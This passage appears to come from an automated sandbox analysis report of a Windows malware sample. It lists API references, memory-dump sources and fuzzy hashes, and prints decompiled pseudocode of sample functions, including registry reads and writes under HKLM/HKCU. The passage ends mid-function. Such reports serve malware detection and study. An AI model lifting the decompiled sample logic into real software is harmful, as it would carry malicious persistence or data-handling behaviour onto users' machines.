                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F75DB
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F75FB
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7608
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7A28
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7A32
                                                                                                                                  • int.LIBCPMT ref: 6E8F7A49
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7A83
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7AA3
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7AB0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E90539F
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E9053A9
                                                                                                                                  • int.LIBCPMT ref: 6E9053C0
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E9053FA
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E90541A
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E905427
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F73C1
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F73CB
                                                                                                                                  • int.LIBCPMT ref: 6E8F73E2
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F741C
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F743C
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7449
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7BE7
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7BF1
                                                                                                                                  • int.LIBCPMT ref: 6E8F7C08
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7C42
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7C62
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7C6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1B73
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1B7D
                                                                                                                                  • int.LIBCPMT ref: 6E8F1B94
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F1BCE
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F1BEE
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F1BFB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F78FE
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7908
                                                                                                                                  • int.LIBCPMT ref: 6E8F791F
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F7959
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7979
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7986
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7869
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7873
                                                                                                                                  • int.LIBCPMT ref: 6E8F788A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F78C4
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F78E4
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F78F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7993
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F799D
                                                                                                                                  • int.LIBCPMT ref: 6E8F79B4
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F79EE
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7A0E
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7A1B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E031A282B(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				signed int* _v16;
                                                                                                                                  				char _v284;
                                                                                                                                  				void* __esi;
                                                                                                                                  				char* _t59;
                                                                                                                                  				intOrPtr* _t60;
                                                                                                                                  				intOrPtr _t64;
                                                                                                                                  				char _t65;
                                                                                                                                  				intOrPtr _t68;
                                                                                                                                  				intOrPtr _t69;
                                                                                                                                  				intOrPtr _t71;
                                                                                                                                  				void* _t73;
                                                                                                                                  				signed int _t81;
                                                                                                                                  				void* _t91;
                                                                                                                                  				void* _t92;
                                                                                                                                  				char _t98;
                                                                                                                                  				signed int* _t100;
                                                                                                                                  				intOrPtr* _t101;
                                                                                                                                  				void* _t102;
                                                                                                                                  
                                                                                                                                  				_t92 = __ecx;
                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                  				_t98 = _a16;
                                                                                                                                  				if(_t98 == 0) {
                                                                                                                                  					__imp__( &_v284,  *0x31ad37c);
                                                                                                                                  					_t91 = 0x80000002;
                                                                                                                                  					L6:
                                                                                                                                  					_t59 = E031A1922( &_v284,  &_v284);
                                                                                                                                  					_a8 = _t59;
                                                                                                                                  					if(_t59 == 0) {
                                                                                                                                  						_v8 = 8;
                                                                                                                                  						L29:
                                                                                                                                  						_t60 = _a20;
                                                                                                                                  						if(_t60 != 0) {
                                                                                                                                  							 *_t60 =  *_t60 + 1;
                                                                                                                                  						}
                                                                                                                                  						return _v8;
                                                                                                                                  					}
                                                                                                                                  					_t101 = _a24;
                                                                                                                                  					if(E031A5C6E(_t92, _t97, _t101, _t91, _t59) != 0) {
                                                                                                                                  						L27:
                                                                                                                                  						E031A4AAB(_a8);
                                                                                                                                  						goto L29;
                                                                                                                                  					}
                                                                                                                                  					_t64 =  *0x31ad2b0; // 0x5bd9b38
                                                                                                                                  					_t16 = _t64 + 0xc; // 0x5bd9c06
                                                                                                                                  					_t65 = E031A1922(_t64,  *_t16);
                                                                                                                                  					_a24 = _t65;
                                                                                                                                  					if(_t65 == 0) {
                                                                                                                                  						L14:
                                                                                                                                  						_t29 = _t101 + 0x14; // 0x102
                                                                                                                                  						_t33 = _t101 + 0x10; // 0x3d031ac0
                                                                                                                                  						if(E031A4A6D(_t97,  *_t33, _t91, _a8,  *0x31ad374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                                                                                                                  							_t68 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  							if(_t98 == 0) {
                                                                                                                                  								_t35 = _t68 + 0x31aea48; // 0x4d4c4b48
                                                                                                                                  								_t69 = _t35;
                                                                                                                                  							} else {
                                                                                                                                  								_t34 = _t68 + 0x31aea43; // 0x55434b48
                                                                                                                                  								_t69 = _t34;
                                                                                                                                  							}
                                                                                                                                  							if(E031A5F64(_t69,  *0x31ad374,  *0x31ad378,  &_a24,  &_a16) == 0) {
                                                                                                                                  								if(_t98 == 0) {
                                                                                                                                  									_t71 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  									_t44 = _t71 + 0x31ae83e; // 0x74666f53
                                                                                                                                  									_t73 = E031A1922(_t44, _t44);
                                                                                                                                  									_t99 = _t73;
                                                                                                                                  									if(_t73 == 0) {
                                                                                                                                  										_v8 = 8;
                                                                                                                                  									} else {
                                                                                                                                  										_t47 = _t101 + 0x10; // 0x3d031ac0
                                                                                                                                  										E031A5DDA( *_t47, _t91, _a8,  *0x31ad378, _a24);
                                                                                                                                  										_t49 = _t101 + 0x10; // 0x3d031ac0
                                                                                                                                  										E031A5DDA( *_t49, _t91, _t99,  *0x31ad370, _a16);
                                                                                                                                  										E031A4AAB(_t99);
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									_t40 = _t101 + 0x10; // 0x3d031ac0
                                                                                                                                  									E031A5DDA( *_t40, _t91, _a8,  *0x31ad378, _a24);
                                                                                                                                  									_t43 = _t101 + 0x10; // 0x3d031ac0
                                                                                                                                  									E031A5DDA( *_t43, _t91, _a8,  *0x31ad370, _a16);
                                                                                                                                  								}
                                                                                                                                  								if( *_t101 != 0) {
                                                                                                                                  									E031A4AAB(_a24);
                                                                                                                                  								} else {
                                                                                                                                  									 *_t101 = _a16;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						goto L27;
                                                                                                                                  					}
                                                                                                                                  					_t21 = _t101 + 0x10; // 0x3d031ac0
                                                                                                                                  					_t81 = E031A63F5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                                                                                                                  					if(_t81 == 0) {
                                                                                                                                  						_t100 = _v16;
                                                                                                                                  						if(_v12 == 0x28) {
                                                                                                                                  							 *_t100 =  *_t100 & _t81;
                                                                                                                                  							_t26 = _t101 + 0x10; // 0x3d031ac0
                                                                                                                                  							E031A4A6D(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                                                                                                  						}
                                                                                                                                  						E031A4AAB(_t100);
                                                                                                                                  						_t98 = _a16;
                                                                                                                                  					}
                                                                                                                                  					E031A4AAB(_a24);
                                                                                                                                  					goto L14;
                                                                                                                                  				}
                                                                                                                                  				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                                                                                                  					goto L29;
                                                                                                                                  				} else {
                                                                                                                                  					_t97 = _a8;
                                                                                                                                  					E031AA938(_t98, _a8,  &_v284);
                                                                                                                                  					__imp__(_t102 + _t98 - 0x117,  *0x31ad37c);
                                                                                                                                  					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                                                                                                  					_t91 = 0x80000003;
                                                                                                                                  					goto L6;
                                                                                                                                  				}
                                                                                                                                  			}
























                                                                                                                                  APIs
                                                                                                                                  • StrChrA.SHLWAPI(031A2197,0000005F,00000000,00000000,00000104), ref: 031A285E
                                                                                                                                  • lstrcpy.KERNEL32(?,?), ref: 031A288B
                                                                                                                                    • Part of subcall function 031A1922: lstrlen.KERNEL32(?,00000000,05BD9B38,00000000,031A74FF,05BD9D16,?,?,?,?,?,69B25F44,00000005,031AD00C), ref: 031A1929
                                                                                                                                    • Part of subcall function 031A1922: mbstowcs.NTDLL ref: 031A1952
                                                                                                                                    • Part of subcall function 031A1922: memset.NTDLL ref: 031A1964
                                                                                                                                    • Part of subcall function 031A5DDA: lstrlenW.KERNEL32(?,?,?,031A29F4,3D031AC0,80000002,031A2197,031A258B,74666F53,4D4C4B48,031A258B,?,3D031AC0,80000002,031A2197,?), ref: 031A5DFF
                                                                                                                                    • Part of subcall function 031A4AAB: RtlFreeHeap.NTDLL(00000000,00000000,031A5012,00000000,?,?,00000000), ref: 031A4AB7
                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 031A28AD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                                  • String ID: ($\
                                                                                                                                  • API String ID: 3924217599-1512714803
                                                                                                                                  • Opcode ID: 7ee7cfee9ff99b9a664cb2e7bf7eb714d5bac6c6c9cb08a64d09ab9964154343
                                                                                                                                  • Instruction ID: fbee34389d8f7b49d24ff1c3f09e16aef523d3c1685bf82537652f85facb847b
                                                                                                                                  • Opcode Fuzzy Hash: 7ee7cfee9ff99b9a664cb2e7bf7eb714d5bac6c6c9cb08a64d09ab9964154343
                                                                                                                                  • Instruction Fuzzy Hash: 6F515D7A100E09AFDF26EF68DC40EAA77BAFF0C302F149914FA159A520D731D956DB20
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 2204710431-1686923651
                                                                                                                                  • Opcode ID: 9d4bcbeb06d206b8713bd4c3b54ca893d0ddde55cad070fc19330a0dd95971b4
                                                                                                                                  • Instruction ID: 5432ddae9369842a7e26f9663d4ef6ea3061af4ab918a544d97c6a3d04249322
                                                                                                                                  • Opcode Fuzzy Hash: 9d4bcbeb06d206b8713bd4c3b54ca893d0ddde55cad070fc19330a0dd95971b4
                                                                                                                                  • Instruction Fuzzy Hash: 72217FB1904A96AFDB21CFB8849076BBEECAF18254F044E1EE459C7A41E734D602CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                  			E031A4B98() {
                                                                                                                                  				void* _v0;
                                                                                                                                  				void** _t3;
                                                                                                                                  				void** _t5;
                                                                                                                                  				void** _t7;
                                                                                                                                  				void** _t8;
                                                                                                                                  				void* _t10;
                                                                                                                                  
                                                                                                                                  				_t3 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  				__imp__( &(_t3[0x10]));
                                                                                                                                  				while(1) {
                                                                                                                                  					_t5 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                                                  					if( *_t1 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					Sleep(0xa);
                                                                                                                                  				}
                                                                                                                                  				_t7 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  				_t10 =  *_t7;
                                                                                                                                  				if(_t10 != 0 && _t10 != 0x31ae823) {
                                                                                                                                  					HeapFree( *0x31ad270, 0, _t10);
                                                                                                                                  					_t7 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  				}
                                                                                                                                  				 *_t7 = _v0;
                                                                                                                                  				_t8 =  &(_t7[0x10]);
                                                                                                                                  				__imp__(_t8);
                                                                                                                                  				return _t8;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(05BD9570), ref: 031A4BA1
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,031A5390), ref: 031A4BAB
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,031A5390), ref: 031A4BD9
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(05BD9570), ref: 031A4BEE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 58946197-8415677
                                                                                                                                  • Opcode ID: 59879399f099a70f4831df3c8357579515678a1d88963dfa4303bb1769ffad6a
                                                                                                                                  • Instruction ID: 3ca0db9768e5d38d0e68a286d1b18eb77513e70fc8ca8ea181c3f877dcd8585d
                                                                                                                                  • Opcode Fuzzy Hash: 59879399f099a70f4831df3c8357579515678a1d88963dfa4303bb1769ffad6a
                                                                                                                                  • Instruction Fuzzy Hash: 93F0DABC604E00AFEB1CEB69EA69F1637E4BB4D303B054019E502D7754DB70A880DA70
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$InformationTimeZone
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 597776487-0
                                                                                                                                  • Opcode ID: 2525265a8903948deb8fe8377bf5de155e90388b3dbb5dc1fea4b5f2201ae055
                                                                                                                                  • Instruction ID: 40db86d213b3e28abae1ab7155b046fa1296401fb8678ee60d0cc2525e22bb79
                                                                                                                                  • Opcode Fuzzy Hash: 2525265a8903948deb8fe8377bf5de155e90388b3dbb5dc1fea4b5f2201ae055
                                                                                                                                  • Instruction Fuzzy Hash: AEC126719142259FDB108FF88850BEE7BBEAF96358F344969D490AB285F731CA42CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3033488037-0
                                                                                                                                  • Opcode ID: 3a2a9ffbba49252ecc00564889112a80e9954c9ae6f56eb0d11fbc6cc8e3ddcb
                                                                                                                                  • Instruction ID: 82f023b999c3dbb32c2ab1f495dcb7a8f1f98f948c5c582d9c68e0e3c7da7879
                                                                                                                                  • Opcode Fuzzy Hash: 3a2a9ffbba49252ecc00564889112a80e9954c9ae6f56eb0d11fbc6cc8e3ddcb
                                                                                                                                  • Instruction Fuzzy Hash: C951E532A00715AFEB10DFAAC880AAA77F8FF59714F244969E815DB250E731D901CF80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MaklocchrMaklocstr$H_prolog3_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2404127365-0
                                                                                                                                  • Opcode ID: 553052bb9a527c4a483356c8188f8bd8eb366442fb42275b7b9b83cdb0162acf
                                                                                                                                  • Instruction ID: 9d9f6c3f39ee678dd2dadd4c07138d11817211271ce1b65009b54289335904b0
                                                                                                                                  • Opcode Fuzzy Hash: 553052bb9a527c4a483356c8188f8bd8eb366442fb42275b7b9b83cdb0162acf
                                                                                                                                  • Instruction Fuzzy Hash: BE2125B1C00348EFDB14DFE5D8849DABBB8AF84714F00895AE9159F255EB70DA41CFA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocstr$Maklocchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2020259771-0
                                                                                                                                  • Opcode ID: 2833313188859c668e58f4cf59359ed7e4d85d9231e0e25294733c2f7c2fcab2
                                                                                                                                  • Instruction ID: 877c5e5175563c59976a1fc4e5f63ef5d0250026fd5787aa7b6c7256552b63e9
                                                                                                                                  • Opcode Fuzzy Hash: 2833313188859c668e58f4cf59359ed7e4d85d9231e0e25294733c2f7c2fcab2
                                                                                                                                  • Instruction Fuzzy Hash: CB116DB1960745FFE6208BE99840B52B7ECAF04694F048E2AF2448B640D365F95197E4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6E93CEFD
                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93CF0F
                                                                                                                                  • _free.LIBCMT ref: 6E93CF21
                                                                                                                                  • _free.LIBCMT ref: 6E93CF33
                                                                                                                                  • _free.LIBCMT ref: 6E93CF45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 18da560f28fd09a14ca3f854e1c34fd2ec7704841c61a228db5dd80ea5b4ff81
                                                                                                                                  • Instruction ID: 6317e2dcd4c17c898ec34a8ae09e7dc21c832c8673b0bc5dcaf0d10dc1b83b76
                                                                                                                                  • Opcode Fuzzy Hash: 18da560f28fd09a14ca3f854e1c34fd2ec7704841c61a228db5dd80ea5b4ff81
                                                                                                                                  • Instruction Fuzzy Hash: CDF06D35509E34ABCA40DBDAE488DDB37EDAF42614BB84C05F018DB601CB30F8C48EA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Smanip$task
                                                                                                                                  • String ID: .
                                                                                                                                  • API String ID: 1925983085-248832578
                                                                                                                                  • Opcode ID: a65e16cce39e5dae10fafb00ba16f26399d7800388a94bfdd3592628b3517f70
                                                                                                                                  • Instruction ID: 11973df3d927521aebf228c1b77d65fb753f2ca8bfa0d7065b47be3915b1b248
                                                                                                                                  • Opcode Fuzzy Hash: a65e16cce39e5dae10fafb00ba16f26399d7800388a94bfdd3592628b3517f70
                                                                                                                                  • Instruction Fuzzy Hash: FF8139B1904628DFCF08CF98CA90EEA77B5FF57304F108959D206A7684D7B4AA4CDB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                  			E031A577D(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* __edi;
                                                                                                                                  				intOrPtr _t18;
                                                                                                                                  				void* _t24;
                                                                                                                                  				void* _t30;
                                                                                                                                  				void* _t36;
                                                                                                                                  				void* _t40;
                                                                                                                                  				intOrPtr _t42;
                                                                                                                                  
                                                                                                                                  				_t36 = __edx;
                                                                                                                                  				_t32 = __ecx;
